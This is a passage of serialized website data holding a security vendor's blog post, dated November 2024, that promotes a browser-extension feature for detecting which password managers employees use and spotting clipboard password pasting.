ame":2909,"jobTitle":514,"profilePicture":168676},{"url":2911},{"__typename":1528,"sys":168678,"content":168679,"title":46324,"synopsis":169048,"hashTags":118,"publishedDate":169049,"slug":46325,"tagsCollection":169050,"authorsCollection":169056},{"id":24875},{"json":168680},{"nodeType":165,"data":168681,"content":168682},{},[168683,168689,168692,168699,168706,168731,168734,168741,168748,168755,168774,168781,168784,168791,168798,168805,168812,168819,168852,168858,168891,168897,168900,168907,168914,168921,168927,168934,168940,168947,168950,168957,168972,168978,168985,169008,169011,169018,169036,169042],{"nodeType":312,"data":168684,"content":168688},{"target":168685},{"sys":168686},{"id":168687,"type":317,"linkType":318},"2qUzJLoMtI3Uaf3ooGw582",[],{"nodeType":231,"data":168690,"content":168691},{},[],{"nodeType":169,"data":168693,"content":168694},{},[168695],{"nodeType":173,"value":168696,"marks":168697,"data":168698},"Which password managers are my employees using?",[],{},{"nodeType":178,"data":168700,"content":168701},{},[168702],{"nodeType":173,"value":168703,"marks":168704,"data":168705},"Tens of millions of people now use password managers, both at work and at home. And it probably won’t come as much of a surprise that most of Push’s security-savvy customers also provide their users with a corporate password manager. ",[],{},{"nodeType":178,"data":168707,"content":168708},{},[168709,168713,168718,168722,168727],{"nodeType":173,"value":168710,"marks":168711,"data":168712},"Up until now, Push has been able to show you whether or not your employees are using ",[],{},{"nodeType":173,"value":168714,"marks":168715,"data":168717},"a",[168716],{"type":194},{},{"nodeType":173,"value":168719,"marks":168720,"data":168721}," password manager to log into their work apps. But now, we can actually show you ",[],{},{"nodeType":173,"value":168723,"marks":168724,"data":168726},"which",[168725],{"type":194},{},{"nodeType":173,"value":168728,"marks":168729,"data":168730}," password managers they’re using.",[],{},{"nodeType":231,"data":168732,"content":168733},{},[],{"nodeType":169,"data":168735,"content":168736},{},[168737],{"nodeType":173,"value":168738,"marks":168739,"data":168740},"There’s more than first meets the eye with this detection   ",[],{},{"nodeType":178,"data":168742,"content":168743},{},[168744],{"nodeType":173,"value":168745,"marks":168746,"data":168747},"There’s a couple of reasons why you’ll want to know which password managers your employees are using.",[],{},{"nodeType":178,"data":168749,"content":168750},{},[168751],{"nodeType":173,"value":168752,"marks":168753,"data":168754},"The obvious one is to make sure all your employees are using, and benefiting from, the password manager you're providing them with. They’re not cheap and you’ll want to get the best bang for your buck. ",[],{},{"nodeType":178,"data":168756,"content":168757},{},[168758,168762,168770],{"nodeType":173,"value":168759,"marks":168760,"data":168761},"The second reason speaks to a specific concern a lot of security teams have around attackers compromising users’ personal password managers containing corporate passwords, and then being able to pivot into the organization's corporate environment. This is a very valid concern given ",[],{},{"nodeType":186,"data":168763,"content":168764},{"uri":126102},[168765],{"nodeType":173,"value":168766,"marks":168767,"data":168769},"the rise in attacks using infostealers",[168768],{"type":194},{},{"nodeType":173,"value":168771,"marks":168772,"data":168773}," following the Snowflake breach earlier this year. ",[],{},{"nodeType":178,"data":168775,"content":168776},{},[168777],{"nodeType":173,"value":168778,"marks":168779,"data":168780},"Using this feature, you can now detect which password managers are storing credentials for your most sensitive systems and stop this attack scenario from happening.   ",[],{},{"nodeType":231,"data":168782,"content":168783},{},[],{"nodeType":169,"data":168785,"content":168786},{},[168787],{"nodeType":173,"value":168788,"marks":168789,"data":168790},"Why corporate passwords in personal password managers is a big no-no",[],{},{"nodeType":178,"data":168792,"content":168793},{},[168794],{"nodeType":173,"value":168795,"marks":168796,"data":168797},"Remote working, BYOD, and users having both personal and professional accounts on the same platforms (Google, Microsoft etc.) have all blurred the line between people’s work lives and their home lives. It’s not uncommon for one to spill over into the other, and one place we see evidence of this is in password managers. ",[],{},{"nodeType":178,"data":168799,"content":168800},{},[168801],{"nodeType":173,"value":168802,"marks":168803,"data":168804},"Creds for personal accounts end up getting stored in corporate password managers, and corporate creds end up getting stored in personal password managers. ",[],{},{"nodeType":178,"data":168806,"content":168807},{},[168808],{"nodeType":173,"value":168809,"marks":168810,"data":168811},"The big risk when the latter happens is that a sensitive corporate asset (a users’ Microsoft account password for example) is effectively being exfiltrated out of the corporate environment by the user, and placed out of reach of your security team. ",[],{},{"nodeType":178,"data":168813,"content":168814},{},[168815],{"nodeType":173,"value":168816,"marks":168817,"data":168818},"This creates new opportunities for attackers: ",[],{},{"nodeType":250,"data":168820,"content":168821},{},[168822,168832,168842],{"nodeType":254,"data":168823,"content":168824},{},[168825],{"nodeType":178,"data":168826,"content":168827},{},[168828],{"nodeType":173,"value":168829,"marks":168830,"data":168831},"Your average user’s personal laptop isn't going to be as well protected as their company laptop. So they offer an easier target for attackers using traditional endpoint compromise techniques. ",[],{},{"nodeType":254,"data":168833,"content":168834},{},[168835],{"nodeType":178,"data":168836,"content":168837},{},[168838],{"nodeType":173,"value":168839,"marks":168840,"data":168841},"An attacker can compromise a personal laptop with infostealer malware that targets password managers in the browser. If corporate credentials are stored in that personal password manager then they are also going to be stolen. ",[],{},{"nodeType":254,"data":168843,"content":168844},{},[168845],{"nodeType":178,"data":168846,"content":168847},{},[168848],{"nodeType":173,"value":168849,"marks":168850,"data":168851},"Now the attacker is in possession of the user's Microsoft account credentials, they can potentially pivot from a personal laptop to one of your organization's core platforms over the internet.  ",[],{},{"nodeType":312,"data":168853,"content":168857},{"target":168854},{"sys":168855},{"id":168856,"type":317,"linkType":318},"Dw05IslqXVN5unTFuvTZV",[],{"nodeType":235,"data":168859,"content":168860},{},[168861,168865,168870,168874,168879,168883,168888],{"nodeType":173,"value":168862,"marks":168863,"data":168864},"Using Push, you can now make sure that sensitive ",[],{},{"nodeType":173,"value":168866,"marks":168867,"data":168869},"corporate credentials",[168868],{"type":194},{},{"nodeType":173,"value":168871,"marks":168872,"data":168873}," stay in your ",[],{},{"nodeType":173,"value":168875,"marks":168876,"data":168878},"corporate password manager",[168877],{"type":194},{},{"nodeType":173,"value":168880,"marks":168881,"data":168882}," and don’t leave your ",[],{},{"nodeType":173,"value":168884,"marks":168885,"data":168887},"corporate environment.",[168886],{"type":194},{},{"nodeType":173,"value":3107,"marks":168889,"data":168890},[],{},{"nodeType":312,"data":168892,"content":168896},{"target":168893},{"sys":168894},{"id":168895,"type":317,"linkType":318},"27d7qit3k7ETS9lemJexIJ",[],{"nodeType":231,"data":168898,"content":168899},{},[],{"nodeType":169,"data":168901,"content":168902},{},[168903],{"nodeType":173,"value":168904,"marks":168905,"data":168906},"All powered by the Push browser extension",[],{},{"nodeType":178,"data":168908,"content":168909},{},[168910],{"nodeType":173,"value":168911,"marks":168912,"data":168913},"Push detects which password managers your employees are using with our browser extension. It observes all your employees logins using their work identities. The telemetry the browser extension generates shows you what employees are logging into, when they’re logging in, how they’re logging in, and if any aspect of that login process is risky or potentially malicious. ",[],{},{"nodeType":178,"data":168915,"content":168916},{},[168917],{"nodeType":173,"value":168918,"marks":168919,"data":168920},"The password managers (and browsers with built-in password managers) supported by this detection are: ",[],{},{"nodeType":312,"data":168922,"content":168926},{"target":168923},{"sys":168924},{"id":168925,"type":317,"linkType":318},"7q3CYLPpBhEGyCeP4S0bzJ",[],{"nodeType":178,"data":168928,"content":168929},{},[168930],{"nodeType":173,"value":168931,"marks":168932,"data":168933},"When a login using one of those password managers is observed by Push, it appears in your events feed. This data can be sent to your SIEM using Push’s webhooks. ",[],{},{"nodeType":312,"data":168935,"content":168939},{"target":168936},{"sys":168937},{"id":168938,"type":317,"linkType":318},"qDRJ7CYd81L4RUHQBuHvQ",[],{"nodeType":178,"data":168941,"content":168942},{},[168943],{"nodeType":173,"value":168944,"marks":168945,"data":168946},"The password manager user will also appear on the corresponding account on the accounts page. Here you can see every workforce account and the login methods used to access them. ",[],{},{"nodeType":231,"data":168948,"content":168949},{},[],{"nodeType":169,"data":168951,"content":168952},{},[168953],{"nodeType":173,"value":168954,"marks":168955,"data":168956},"Bonus feature — detecting clipboard pasting",[],{},{"nodeType":178,"data":168958,"content":168959},{},[168960,168964,168969],{"nodeType":173,"value":168961,"marks":168962,"data":168963},"The eagle-eyed among you might have seen that in the list of supported “password managers” is one called ",[],{},{"nodeType":173,"value":168965,"marks":168966,"data":168968},"Clipboard paste",[168967],{"type":370},{},{"nodeType":173,"value":197,"marks":168970,"data":168971},[],{},{"nodeType":312,"data":168973,"content":168977},{"target":168974},{"sys":168975},{"id":168976,"type":317,"linkType":318},"2ApsFXkrSznhT7cJqSOAIV",[],{"nodeType":178,"data":168979,"content":168980},{},[168981],{"nodeType":173,"value":168982,"marks":168983,"data":168984},"You’ll see this when we observe users pasting a password into the password field. This detection is really useful for a couple of reasons:",[],{},{"nodeType":250,"data":168986,"content":168987},{},[168988,168998],{"nodeType":254,"data":168989,"content":168990},{},[168991],{"nodeType":178,"data":168992,"content":168993},{},[168994],{"nodeType":173,"value":168995,"marks":168996,"data":168997},"Copying passwords from a password manager and pasting them into a login page is bad practice. Password managers typically also store which page the password is for so they won't auto-populate on a phishing page. Pasting your password manually makes you more susceptible to being phished.",[],{},{"nodeType":254,"data":168999,"content":169000},{},[169001],{"nodeType":178,"data":169002,"content":169003},{},[169004],{"nodeType":173,"value":169005,"marks":169006,"data":169007},"Or, it could indicate that the user is storing their passwords in a notes app, word doc, spreadsheet etc. Obviously these are all low hanging fruit for any attacker so you want to get the user to move their passwords into their password manager and set fire to whatever doc they had been using. ",[],{},{"nodeType":231,"data":169009,"content":169010},{},[],{"nodeType":169,"data":169012,"content":169013},{},[169014],{"nodeType":173,"value":169015,"marks":169016,"data":169017},"Try it out for yourself",[],{},{"nodeType":178,"data":169019,"content":169020},{},[169021,169025,169033],{"nodeType":173,"value":169022,"marks":169023,"data":169024},"If you have any question about this feature or any other of our detection use cases, ",[],{},{"nodeType":186,"data":169026,"content":169027},{"uri":473},[169028],{"nodeType":173,"value":169029,"marks":169030,"data":169032},"book a meeting with one of our team",[169031],{"type":194},{},{"nodeType":173,"value":1477,"marks":169034,"data":169035},[],{},{"nodeType":312,"data":169037,"content":169041},{"target":169038},{"sys":169039},{"id":169040,"type":317,"linkType":318},"6iKFd9Qys2SSuNqKVQB7ka",[],{"nodeType":178,"data":169043,"content":169044},{},[169045],{"nodeType":173,"value":37,"marks":169046,"data":169047},[],{},"Make sure sensitive corporate credentials don’t leave your corporate environment and end up in personal password managers with Push.","2024-11-05T00:00:00.000Z",{"items":169051},[169052,169054],{"sys":169053,"name":18399},{"id":18398},{"sys":169055,"name":26137},{"id":26136},{"items":169057},[169058],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":169059},{"url":516},{"__typename":1528,"sys":169061,"content":169062,"title":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":169752,"authorsCollection":169756},{"id":3979},{"json":169063},{"data":169064,"content":169065,"nodeType":165},{},[169066,169071,169087,169093,169099,169104,169107,169114,169120,169136,169146,169152,169158,169164,169248,169251,169258,169333,169338,169341,169348,169355,169361,169367,169374,169390,169396,169403,169409,169415,169422,169428,169434,169450,169455,169458,169465,169472,169478,169567,169573,169580,169586,169592,169597,169604,169610,169616,169622,169629,169635,169641,169647,169653,169658,169661,169668,169674,169704,169710,169725,169741,169746],{"data":169067,"content":169070,"nodeType":312},{"target":169068},{"sys":169069},{"id":3988,"type":317,"linkType":318},[],{"data":169072,"content":169073,"nodeType":178},{},[169074,169077,169084],{"data":169075,"marks":169076,"value":3996,"nodeType":173},{},[],{"data":169078,"content":169079,"nodeType":186},{"uri":3999},[169080],{"data":169081,"marks":169082,"value":4005,"nodeType":173},{},[169083],{"type":194},{"data":169085,"marks":169086,"value":4009,"nodeType":173},{},[],{"data":169088,"content":169089,"nodeType":178},{},[169090],{"data":169091,"marks":169092,"value":4016,"nodeType":173},{},[],{"data":169094,"content":169095,"nodeType":178},{},[169096],{"data":169097,"marks":169098,"value":4023,"nodeType":173},{},[],{"data":169100,"content":169103,"nodeType":312},{"target":169101},{"sys":169102},{"id":4028,"type":317,"linkType":318},[],{"data":169105,"content":169106,"nodeType":231},{},[],{"data":169108,"content":169109,"nodeType":169},{},[169110],{"data":169111,"marks":169112,"value":4040,"nodeType":173},{},[169113],{"type":370},{"data":169115,"content":169116,"nodeType":178},{},[169117],{"data":169118,"marks":169119,"value":4047,"nodeType":173},{},[],{"data":169121,"content":169122,"nodeType":178},{},[169123,169126,169133],{"data":169124,"marks":169125,"value":4054,"nodeType":173},{},[],{"data":169127,"content":169128,"nodeType":186},{"uri":4057},[169129],{"data":169130,"marks":169131,"value":4063,"nodeType":173},{},[169132],{"type":194},{"data":169134,"marks":169135,"value":197,"nodeType":173},{},[],{"data":169137,"content":169138,"nodeType":3769},{},[169139],{"data":169140,"content":169141,"nodeType":178},{},[169142],{"data":169143,"marks":169144,"value":4077,"nodeType":173},{},[169145],{"type":370},{"data":169147,"content":169148,"nodeType":178},{},[169149],{"data":169150,"marks":169151,"value":4084,"nodeType":173},{},[],{"data":169153,"content":169154,"nodeType":178},{},[169155],{"data":169156,"marks":169157,"value":4091,"nodeType":173},{},[],{"data":169159,"content":169160,"nodeType":178},{},[169161],{"data":169162,"marks":169163,"value":4098,"nodeType":173},{},[],{"data":169165,"content":169166,"nodeType":250},{},[169167,169176,169185,169194,169203,169212,169221,169230,169239],{"data":169168,"content":169169,"nodeType":254},{},[169170],{"data":169171,"content":169172,"nodeType":178},{},[169173],{"data":169174,"marks":169175,"value":4111,"nodeType":173},{},[],{"data":169177,"content":169178,"nodeType":254},{},[169179],{"data":169180,"content":169181,"nodeType":178},{},[169182],{"data":169183,"marks":169184,"value":4121,"nodeType":173},{},[],{"data":169186,"content":169187,"nodeType":254},{},[169188],{"data":169189,"content":169190,"nodeType":178},{},[169191],{"data":169192,"marks":169193,"value":4131,"nodeType":173},{},[],{"data":169195,"content":169196,"nodeType":254},{},[169197],{"data":169198,"content":169199,"nodeType":178},{},[169200],{"data":169201,"marks":169202,"value":4141,"nodeType":173},{},[],{"data":169204,"content":169205,"nodeType":254},{},[169206],{"data":169207,"content":169208,"nodeType":178},{},[169209],{"data":169210,"marks":169211,"value":4151,"nodeType":173},{},[],{"data":169213,"content":169214,"nodeType":254},{},[169215],{"data":169216,"content":169217,"nodeType":178},{},[169218],{"data":169219,"marks":169220,"value":4161,"nodeType":173},{},[],{"data":169222,"content":169223,"nodeType":254},{},[169224],{"data":169225,"content":169226,"nodeType":178},{},[169227],{"data":169228,"marks":169229,"value":4171,"nodeType":173},{},[],{"data":169231,"content":169232,"nodeType":254},{},[169233],{"data":169234,"content":169235,"nodeType":178},{},[169236],{"data":169237,"marks":169238,"value":4181,"nodeType":173},{},[],{"data":169240,"content":169241,"nodeType":254},{},[169242],{"data":169243,"content":169244,"nodeType":178},{},[169245],{"data":169246,"marks":169247,"value":4191,"nodeType":173},{},[],{"data":169249,"content":169250,"nodeType":231},{},[],{"data":169252,"content":169253,"nodeType":169},{},[169254],{"data":169255,"marks":169256,"value":4202,"nodeType":173},{},[169257],{"type":370},{"data":169259,"content":169260,"nodeType":250},{},[169261,169270,169279,169288,169297,169306,169315,169324],{"data":169262,"content":169263,"nodeType":254},{},[169264],{"data":169265,"content":169266,"nodeType":178},{},[169267],{"data":169268,"marks":169269,"value":4215,"nodeType":173},{},[],{"data":169271,"content":169272,"nodeType":254},{},[169273],{"data":169274,"content":169275,"nodeType":178},{},[169276],{"data":169277,"marks":169278,"value":4225,"nodeType":173},{},[],{"data":169280,"content":169281,"nodeType":254},{},[169282],{"data":169283,"content":169284,"nodeType":178},{},[169285],{"data":169286,"marks":169287,"value":4235,"nodeType":173},{},[],{"data":169289,"content":169290,"nodeType":254},{},[169291],{"data":169292,"content":169293,"nodeType":178},{},[169294],{"data":169295,"marks":169296,"value":4245,"nodeType":173},{},[],{"data":169298,"content":169299,"nodeType":254},{},[169300],{"data":169301,"content":169302,"nodeType":178},{},[169303],{"data":169304,"marks":169305,"value":4255,"nodeType":173},{},[],{"data":169307,"content":169308,"nodeType":254},{},[169309],{"data":169310,"content":169311,"nodeType":178},{},[169312],{"data":169313,"marks":169314,"value":4265,"nodeType":173},{},[],{"data":169316,"content":169317,"nodeType":254},{},[169318],{"data":169319,"content":169320,"nodeType":178},{},[169321],{"data":169322,"marks":169323,"value":4275,"nodeType":173},{},[],{"data":169325,"content":169326,"nodeType":254},{},[169327],{"data":169328,"content":169329,"nodeType":178},{},[169330],{"data":169331,"marks":169332,"value":4285,"nodeType":173},{},[],{"data":169334,"content":169337,"nodeType":312},{"target":169335},{"sys":169336},{"id":4290,"type":317,"linkType":318},[],{"data":169339,"content":169340,"nodeType":231},{},[],{"data":169342,"content":169343,"nodeType":169},{},[169344],{"data":169345,"marks":169346,"value":4302,"nodeType":173},{},[169347],{"type":370},{"data":169349,"content":169350,"nodeType":235},{},[169351],{"data":169352,"marks":169353,"value":4310,"nodeType":173},{},[169354],{"type":370},{"data":169356,"content":169357,"nodeType":178},{},[169358],{"data":169359,"marks":169360,"value":4317,"nodeType":173},{},[],{"data":169362,"content":169363,"nodeType":178},{},[169364],{"data":169365,"marks":169366,"value":4324,"nodeType":173},{},[],{"data":169368,"content":169369,"nodeType":235},{},[169370],{"data":169371,"marks":169372,"value":4332,"nodeType":173},{},[169373],{"type":370},{"data":169375,"content":169376,"nodeType":178},{},[169377,169380,169387],{"data":169378,"marks":169379,"value":4339,"nodeType":173},{},[],{"data":169381,"content":169382,"nodeType":186},{"uri":4342},[169383],{"data":169384,"marks":169385,"value":835,"nodeType":173},{},[169386],{"type":194},{"data":169388,"marks":169389,"value":197,"nodeType":173},{},[],{"data":169391,"content":169392,"nodeType":178},{},[169393],{"data":169394,"marks":169395,"value":4357,"nodeType":173},{},[],{"data":169397,"content":169398,"nodeType":235},{},[169399],{"data":169400,"marks":169401,"value":4365,"nodeType":173},{},[169402],{"type":370},{"data":169404,"content":169405,"nodeType":178},{},[169406],{"data":169407,"marks":169408,"value":4372,"nodeType":173},{},[],{"data":169410,"content":169411,"nodeType":178},{},[169412],{"data":169413,"marks":169414,"value":4379,"nodeType":173},{},[],{"data":169416,"content":169417,"nodeType":235},{},[169418],{"data":169419,"marks":169420,"value":4387,"nodeType":173},{},[169421],{"type":370},{"data":169423,"content":169424,"nodeType":178},{},[169425],{"data":169426,"marks":169427,"value":4394,"nodeType":173},{},[],{"data":169429,"content":169430,"nodeType":178},{},[169431],{"data":169432,"marks":169433,"value":4401,"nodeType":173},{},[],{"data":169435,"content":169436,"nodeType":178},{},[169437,169440,169447],{"data":169438,"marks":169439,"value":4408,"nodeType":173},{},[],{"data":169441,"content":169442,"nodeType":186},{"uri":4411},[169443],{"data":169444,"marks":169445,"value":4417,"nodeType":173},{},[169446],{"type":194},{"data":169448,"marks":169449,"value":4421,"nodeType":173},{},[],{"data":169451,"content":169454,"nodeType":312},{"target":169452},{"sys":169453},{"id":4426,"type":317,"linkType":318},[],{"data":169456,"content":169457,"nodeType":231},{},[],{"data":169459,"content":169460,"nodeType":169},{},[169461],{"data":169462,"marks":169463,"value":4438,"nodeType":173},{},[169464],{"type":370},{"data":169466,"content":169467,"nodeType":235},{},[169468],{"data":169469,"marks":169470,"value":4446,"nodeType":173},{},[169471],{"type":370},{"data":169473,"content":169474,"nodeType":178},{},[169475],{"data":169476,"marks":169477,"value":4453,"nodeType":173},{},[],{"data":169479,"content":169480,"nodeType":250},{},[169481,169500,169519,169548],{"data":169482,"content":169483,"nodeType":254},{},[169484],{"data":169485,"content":169486,"nodeType":178},{},[169487,169490,169497],{"data":169488,"marks":169489,"value":4466,"nodeType":173},{},[],{"data":169491,"content":169492,"nodeType":186},{"uri":4469},[169493],{"data":169494,"marks":169495,"value":4475,"nodeType":173},{},[169496],{"type":194},{"data":169498,"marks":169499,"value":4479,"nodeType":173},{},[],{"data":169501,"content":169502,"nodeType":254},{},[169503],{"data":169504,"content":169505,"nodeType":178},{},[169506,169509,169516],{"data":169507,"marks":169508,"value":4489,"nodeType":173},{},[],{"data":169510,"content":169511,"nodeType":186},{"uri":4492},[169512],{"data":169513,"marks":169514,"value":4498,"nodeType":173},{},[169515],{"type":194},{"data":169517,"marks":169518,"value":1477,"nodeType":173},{},[],{"data":169520,"content":169521,"nodeType":254},{},[169522],{"data":169523,"content":169524,"nodeType":178},{},[169525,169528,169535,169538,169545],{"data":169526,"marks":169527,"value":4511,"nodeType":173},{},[],{"data":169529,"content":169530,"nodeType":186},{"uri":4342},[169531],{"data":169532,"marks":169533,"value":4519,"nodeType":173},{},[169534],{"type":194},{"data":169536,"marks":169537,"value":4523,"nodeType":173},{},[],{"data":169539,"content":169540,"nodeType":186},{"uri":4526},[169541],{"data":169542,"marks":169543,"value":4532,"nodeType":173},{},[169544],{"type":194},{"data":169546,"marks":169547,"value":4536,"nodeType":173},{},[],{"data":169549,"content":169550,"nodeType":254},{},[169551],{"data":169552,"content":169553,"nodeType":178},{},[169554,169557,169564],{"data":169555,"marks":169556,"value":4546,"nodeType":173},{},[],{"data":169558,"content":169559,"nodeType":186},{"uri":4492},[169560],{"data":169561,"marks":169562,"value":4554,"nodeType":173},{},[169563],{"type":194},{"data":169565,"marks":169566,"value":4558,"nodeType":173},{},[],{"data":169568,"content":169569,"nodeType":178},{},[169570],{"data":169571,"marks":169572,"value":4565,"nodeType":173},{},[],{"data":169574,"content":169575,"nodeType":235},{},[169576],{"data":169577,"marks":169578,"value":4573,"nodeType":173},{},[169579],{"type":370},{"data":169581,"content":169582,"nodeType":178},{},[169583],{"data":169584,"marks":169585,"value":4580,"nodeType":173},{},[],{"data":169587,"content":169588,"nodeType":178},{},[169589],{"data":169590,"marks":169591,"value":4587,"nodeType":173},{},[],{"data":169593,"content":169596,"nodeType":312},{"target":169594},{"sys":169595},{"id":4592,"type":317,"linkType":318},[],{"data":169598,"content":169599,"nodeType":235},{},[169600],{"data":169601,"marks":169602,"value":4601,"nodeType":173},{},[169603],{"type":370},{"data":169605,"content":169606,"nodeType":178},{},[169607],{"data":169608,"marks":169609,"value":4608,"nodeType":173},{},[],{"data":169611,"content":169612,"nodeType":178},{},[169613],{"data":169614,"marks":169615,"value":4615,"nodeType":173},{},[],{"data":169617,"content":169618,"nodeType":178},{},[169619],{"data":169620,"marks":169621,"value":4622,"nodeType":173},{},[],{"data":169623,"content":169624,"nodeType":235},{},[169625],{"data":169626,"marks":169627,"value":4630,"nodeType":173},{},[169628],{"type":370},{"data":169630,"content":169631,"nodeType":178},{},[169632],{"data":169633,"marks":169634,"value":4637,"nodeType":173},{},[],{"data":169636,"content":169637,"nodeType":178},{},[169638],{"data":169639,"marks":169640,"value":4644,"nodeType":173},{},[],{"data":169642,"content":169643,"nodeType":178},{},[169644],{"data":169645,"marks":169646,"value":4651,"nodeType":173},{},[],{"data":169648,"content":169649,"nodeType":178},{},[169650],{"data":169651,"marks":169652,"value":4658,"nodeType":173},{},[],{"data":169654,"content":169657,"nodeType":312},{"target":169655},{"sys":169656},{"id":4663,"type":317,"linkType":318},[],{"data":169659,"content":169660,"nodeType":231},{},[],{"data":169662,"content":169663,"nodeType":169},{},[169664],{"data":169665,"marks":169666,"value":4675,"nodeType":173},{},[169667],{"type":370},{"data":169669,"content":169670,"nodeType":178},{},[169671],{"data":169672,"marks":169673,"value":4682,"nodeType":173},{},[],{"data":169675,"content":169676,"nodeType":250},{},[169677,169686,169695],{"data":169678,"content":169679,"nodeType":254},{},[169680],{"data":169681,"content":169682,"nodeType":178},{},[169683],{"data":169684,"marks":169685,"value":4695,"nodeType":173},{},[],{"data":169687,"content":169688,"nodeType":254},{},[169689],{"data":169690,"content":169691,"nodeType":178},{},[169692],{"data":169693,"marks":169694,"value":4705,"nodeType":173},{},[],{"data":169696,"content":169697,"nodeType":254},{},[169698],{"data":169699,"content":169700,"nodeType":178},{},[169701],{"data":169702,"marks":169703,"value":4715,"nodeType":173},{},[],{"data":169705,"content":169706,"nodeType":178},{},[169707],{"data":169708,"marks":169709,"value":4722,"nodeType":173},{},[],{"data":169711,"content":169712,"nodeType":178},{},[169713,169716,169722],{"data":169714,"marks":169715,"value":4729,"nodeType":173},{},[],{"data":169717,"content":169718,"nodeType":186},{"uri":4732},[169719],{"data":169720,"marks":169721,"value":4737,"nodeType":173},{},[],{"data":169723,"marks":169724,"value":4741,"nodeType":173},{},[],{"data":169726,"content":169727,"nodeType":178},{},[169728,169731,169738],{"data":169729,"marks":169730,"value":4748,"nodeType":173},{},[],{"data":169732,"content":169733,"nodeType":186},{"uri":4751},[169734],{"data":169735,"marks":169736,"value":4757,"nodeType":173},{},[169737],{"type":194},{"data":169739,"marks":169740,"value":4761,"nodeType":173},{},[],{"data":169742,"content":169745,"nodeType":312},{"target":169743},{"sys":169744},{"id":4766,"type":317,"linkType":318},[],{"data":169747,"content":169748,"nodeType":178},{},[169749],{"data":169750,"marks":169751,"value":37,"nodeType":173},{},[],{"items":169753},[169754],{"sys":169755,"name":505},{"id":504},{"items":169757},[169758],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":169759},{"url":1496},{"items":169761},[169762],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":169763},{"url":155985},{"json":169765,"links":170034},{"data":169766,"content":169767,"nodeType":165},{},[169768,169774,169780,169796,169812,169833,169839,169852,169858,169864,169870,169873,169879,169895,169911,169916,169932,169938,169944,169949,169955,169960,169986,169992,170008,170011,170017,170023,170028],{"data":169769,"content":169770,"nodeType":169},{},[169771],{"data":169772,"marks":169773,"value":155662,"nodeType":173},{},[],{"data":169775,"content":169776,"nodeType":178},{},[169777],{"data":169778,"marks":169779,"value":155669,"nodeType":173},{},[],{"data":169781,"content":169782,"nodeType":178},{},[169783,169786,169793],{"data":169784,"marks":169785,"value":155676,"nodeType":173},{},[],{"data":169787,"content":169788,"nodeType":186},{"uri":155679},[169789],{"data":169790,"marks":169791,"value":155685,"nodeType":173},{},[169792],{"type":194},{"data":169794,"marks":169795,"value":197,"nodeType":173},{},[],{"data":169797,"content":169798,"nodeType":178},{},[169799,169802,169809],{"data":169800,"marks":169801,"value":155695,"nodeType":173},{},[],{"data":169803,"content":169804,"nodeType":186},{"uri":4492},[169805],{"data":169806,"marks":169807,"value":155703,"nodeType":173},{},[169808],{"type":194},{"data":169810,"marks":169811,"value":39946,"nodeType":173},{},[],{"data":169813,"content":169814,"nodeType":250},{},[169815,169824],{"data":169816,"content":169817,"nodeType":254},{},[169818],{"data":169819,"content":169820,"nodeType":178},{},[169821],{"data":169822,"marks":169823,"value":155719,"nodeType":173},{},[],{"data":169825,"content":169826,"nodeType":254},{},[169827],{"data":169828,"content":169829,"nodeType":178},{},[169830],{"data":169831,"marks":169832,"value":155729,"nodeType":173},{},[],{"data":169834,"content":169835,"nodeType":178},{},[169836],{"data":169837,"marks":169838,"value":155736,"nodeType":173},{},[],{"data":169840,"content":169841,"nodeType":178},{},[169842,169845,169849],{"data":169843,"marks":169844,"value":155743,"nodeType":173},{},[],{"data":169846,"marks":169847,"value":155748,"nodeType":173},{},[169848],{"type":194},{"data":169850,"marks":169851,"value":155752,"nodeType":173},{},[],{"data":169853,"content":169854,"nodeType":178},{},[169855],{"data":169856,"marks":169857,"value":155759,"nodeType":173},{},[],{"data":169859,"content":169860,"nodeType":178},{},[169861],{"data":169862,"marks":169863,"value":155766,"nodeType":173},{},[],{"data":169865,"content":169866,"nodeType":178},{},[169867],{"data":169868,"marks":169869,"value":155773,"nodeType":173},{},[],{"data":169871,"content":169872,"nodeType":231},{},[],{"data":169874,"content":169875,"nodeType":169},{},[169876],{"data":169877,"marks":169878,"value":155783,"nodeType":173},{},[],{"data":169880,"content":169881,"nodeType":178},{},[169882,169885,169892],{"data":169883,"marks":169884,"value":155790,"nodeType":173},{},[],{"data":169886,"content":169887,"nodeType":186},{"uri":155793},[169888],{"data":169889,"marks":169890,"value":155799,"nodeType":173},{},[169891],{"type":194},{"data":169893,"marks":169894,"value":155803,"nodeType":173},{},[],{"data":169896,"content":169897,"nodeType":178},{},[169898,169901,169908],{"data":169899,"marks":169900,"value":155810,"nodeType":173},{},[],{"data":169902,"content":169903,"nodeType":186},{"uri":62639},[169904],{"data":169905,"marks":169906,"value":155818,"nodeType":173},{},[169907],{"type":194},{"data":169909,"marks":169910,"value":197,"nodeType":173},{},[],{"data":169912,"content":169915,"nodeType":312},{"target":169913},{"sys":169914},{"id":155826,"type":317,"linkType":318},[],{"data":169917,"content":169918,"nodeType":178},{},[169919,169922,169929],{"data":169920,"marks":169921,"value":155834,"nodeType":173},{},[],{"data":169923,"content":169924,"nodeType":186},{"uri":3751},[169925],{"data":169926,"marks":169927,"value":155842,"nodeType":173},{},[169928],{"type":194},{"data":169930,"marks":169931,"value":155846,"nodeType":173},{},[],{"data":169933,"content":169934,"nodeType":235},{},[169935],{"data":169936,"marks":169937,"value":155853,"nodeType":173},{},[],{"data":169939,"content":169940,"nodeType":178},{},[169941],{"data":169942,"marks":169943,"value":155860,"nodeType":173},{},[],{"data":169945,"content":169948,"nodeType":312},{"target":169946},{"sys":169947},{"id":155865,"type":317,"linkType":318},[],{"data":169950,"content":169951,"nodeType":178},{},[169952],{"data":169953,"marks":169954,"value":155873,"nodeType":173},{},[],{"data":169956,"content":169959,"nodeType":312},{"target":169957},{"sys":169958},{"id":155878,"type":317,"linkType":318},[],{"data":169961,"content":169962,"nodeType":178},{},[169963,169966,169973,169976,169983],{"data":169964,"marks":169965,"value":155886,"nodeType":173},{},[],{"data":169967,"content":169968,"nodeType":186},{"uri":155889},[169969],{"data":169970,"marks":169971,"value":155895,"nodeType":173},{},[169972],{"type":194},{"data":169974,"marks":169975,"value":155899,"nodeType":173},{},[],{"data":169977,"content":169978,"nodeType":186},{"uri":155902},[169979],{"data":169980,"marks":169981,"value":155908,"nodeType":173},{},[169982],{"type":194},{"data":169984,"marks":169985,"value":155912,"nodeType":173},{},[],{"data":169987,"content":169988,"nodeType":178},{},[169989],{"data":1